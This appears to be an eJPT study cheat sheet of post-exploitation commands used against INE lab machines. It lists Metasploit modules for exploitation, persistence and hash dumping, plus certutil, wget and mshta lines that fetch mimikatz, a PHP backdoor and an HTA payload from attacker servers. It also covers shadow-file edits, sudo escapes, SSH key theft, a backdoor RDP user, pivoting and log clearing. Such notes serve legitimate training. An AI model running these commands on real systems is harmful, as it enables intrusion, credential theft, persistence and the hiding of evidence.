Post Exploitation

Post-Exploitation

  • enumerating windows system information
    • scan nmap -sV demo.ine.local
    • searchsploit searchsploit rejetto, exploit with use exploit/windows/http/rejetto_hfs_exec
    • msf commands sysinfo shell hostname systeminfo
    • detailed info about windows hotfix wmic qfe get Caption,Description,HotFixID,InstalledOn when finding out exact windows version
  • enumerating windows users and groups
    • msf commands getuid getprivs
    • post exploit background use post/windows/gather/enum_logged_on_users set SESSION 1
    • check current permissions whoami /priv
    • check users net users net user administrator
    • check groups net localgroup net localgroup administrators
  • enumerating windows network information
    • cmd commands ipconfig ipconfig /all route print arp -a netstat -ano
  • enumerating processes and services
    • cmd commands ps pgrep explorer.exe migrate 2252
    • check services net start, details wmic service list brief
    • check tasks tasklist /SVC schtasks /query /fo LIST
  • automating windows local enumeration
    • post exploit module for enum privs use post/windows/gather/win_privs
    • post exploit module for logged on users use post/windows/gather/enum_logged_on_users
    • post exploit check vm use post/windows/gather/checkvm
    • post exploit check apps use post/windows/gather/enum_applications
    • post exploit check computers use post/windows/gather/enum_computers
    • post exploit check patches use post/windows/gather/enum_patches
    • cool project https://github.com/411Hall/JAWS, upload with upload /root/Desktop/jaws-enum.ps1
    • execute file powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt download download JAWS-Enum.txt
  • enumerating linux system information
    • commands sysinfo hostname cat /etc/issue cat /etc/*release uname -a lscpu df -h
  • enumerating linux users and groups
    • check user groups information getuid whoami groups root cat /etc/passwd groups who lastlog
  • enumerating linux network information
    • commands ifconfig netstat route cat /etc/networks cat /etc/hosts cat /etc/resolv.conf
  • enumerating processes and cronjobs
    • commands ps pgrep vsftpd ls -al /etc/cron*
  • automating linux local enumeration
    • use background, load modules
    • check os info use post/linux/gather/enum_configs
    • check network use post/linux/gather/enum_network
    • check system config use post/linux/gather/enum_system
    • github https://github.com/rebootuser/LinEnum
  • setting up a web server with python
    • command python -m SimpleHTTPServer 80
  • transferring files with windows targets
    • use python3 -m http.server 80 and certutil -urlcache -f http://10.10.31.3/mimikatz.exe mimikatz.exe
  • transferring files to linux targets
    • use python3 -m http.server 80 and wget http://192.217.117.2/php-backdoor.php
  • upgrading non-interactive shells
    • using bash interactive /bin/bash -i
    • using python python -c 'import pty; pty.spawn("/bin/bash")'
  • windows privesc check
    • check folder cd C:\Users\student\Desktop\PrivescCheck
    • run script powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
    • use the credentials runas.exe /user:administrator cmd
    • start an hta server use exploit/windows/misc/hta_server and execute payload mshta.exe http://10.10.31.2:8080/Rv4eiCTge85UJ15.hta
  • permissions matter!
    • check for writable files find / -not -type l -perm -o+w
    • create password for root user openssl passwd -1 -salt abc password and add the generated entry vim /etc/shadow
  • editing gone wrong
    • check suid binaries find / -user root -perm -4000 -exec ls -ldb {} \;
    • check sudo commands sudo -l
    • launch man and get shell sudo man ls !/bin/bash
  • maintaining access, persistence service
    • use module use exploit/windows/local/persistence_service to get a new session whenever victim reboots
  • maintaining access, rdp
    • migrate to gain privilege getuid ps -S explorer.exe migrate 2764
    • msf meterpreter run getgui -e -u alice -p hack_123321 and login with xfreerdp /u:alice /p:hack_123321 /v:demo.ine.local
  • maintaining access I
    • copy the ssh private key scp student@demo.ine.local:~/.ssh/id_rsa .
    • login with private key chmod 400 id_rsa ssh -i id_rsa student@demo.ine.local
  • local job scheduling
    • create cronjob for http server echo "* * * * * cd /home/student/ && python -m SimpleHTTPServer" > cron crontab -i cron crontab -l
  • windows ntlm hash cracking
    • migrate to lsass.exe migrate -N lsass.exe
    • dump the hashes hashdump
    • check hashes are stored background creds
    • crack hashes use auxiliary/analyze/crack_windows set CUSTOM_WORDLIST /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
  • linux password cracker
    • start the database /etc/init.d/postgresql start
    • linux hashdump use post/linux/gather/hashdump
    • crack hash use auxiliary/analyze/crack_linux set SHA512 true
  • pivoting
    • use ipconfig to check the ip of next machine then use run autoroute -s 10.0.16.0/20
    • now we can scan using use auxiliary/scanner/portscan/tcp
    • do port forwarding portfwd add -l 1234 -p 80 -r demo2.ine.local
  • clearing your own tracks on windows
    • clear event logs clearev
  • clearing your own tracks on linux
    • clear history history -c
    • clear bash history file cat /dev/null > ~/.bash_history
ejpt

Written By

GitHub Contributor Team